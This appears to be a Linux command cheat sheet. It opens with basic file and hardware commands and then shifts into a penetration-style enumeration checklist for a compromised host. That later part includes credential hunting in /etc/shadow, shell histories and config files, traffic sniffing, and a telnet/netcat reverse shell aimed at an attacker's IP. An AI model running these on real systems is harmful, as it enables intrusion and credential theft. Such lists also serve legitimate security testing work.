Linux is now everywhere, so you should try Linux. In Linux, commands are everything. The following are the most commonly used commands.

File Commands

List files in the directory:

ls

List all files (shows hidden files):

ls -a

Show the directory you are currently working in:

pwd

Create a new directory:

mkdir [directory]

Remove a file:

rm [file_name]

Remove a directory recursively (this deletes the directory and everything in it):

rm -rf [directory_name]

Copy the contents of one file to a second file:

cp [file_name1] [file_name2]

Recursively copy the contents of one directory to a second directory:

cp -r [directory_name1] [directory_name2]

Rename [file_name1] to [file_name2] with the command:

mv [file_name1] [file_name2]

Create a symbolic link to a file:

ln -s /path/to/[file_name] [link_name]

Create a new file:

touch [file_name]

Hardware Information

Show bootup messages:

dmesg

See CPU information:

cat /proc/cpuinfo

Display free and used memory with:

free -h

List hardware configuration information:

lshw

See information about block devices:

lsblk

Show PCI devices in a tree-like diagram:

lspci -tv

Display USB devices in a tree-like diagram:

lsusb -tv

Show hardware information from the BIOS:

dmidecode

Display disk data information:

hdparm -i /dev/[device]

Conduct a read-speed test on device/disk:

hdparm -tT /dev/[device]

Test for unreadable blocks on device/disk:

badblocks -s /dev/[device]

What's the kernel version? Is it 64-bit?

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learned from the environment variables?

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Operating System

What's the distribution type? What version?

cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release

Is there a printer?

lpstat -a

Applications & Services

What services are running? Which service has which user privilege?

ps aux
ps -ef
top
cat /etc/services

Which service(s) are being run by root? Of these services, which are vulnerable?

ps aux | grep root
ps -ef | grep root

What applications are installed? What version are they? Are they currently running?

ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'

What jobs are scheduled?

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password' # Joomla

Communications & Networking

What NIC(s) does the system have? Is it connected to another network?

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

What other users & hosts are communicating with the system?

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

What's cached? IP and/or MAC addresses

arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic

tcpdump 'tcp and ((dst host 192.168.1.7 and dst port 80) or (dst host 10.5.5.252 and dst port 21))'

Note: tcpdump 'tcp and ((dst host [ip] and dst port [port]) or (dst host [ip] and dst port [port]))'

Have you got a shell? Can you interact with the system?

nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Output (Results)
telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!

Confidential Information & Users

Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?

id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found?

cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Anything "interesting" in the home directory(ies)? If it's possible to access them

ls -ahlR /root/
ls -ahlR /home/

Are there any passwords in scripts, databases, configuration files, or log files? Default paths and locations for passwords

cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user been doing? Is there any password in plain text? What have they been editing?

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found?

cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root


Hope you like this list. Save this list. It helps you every time.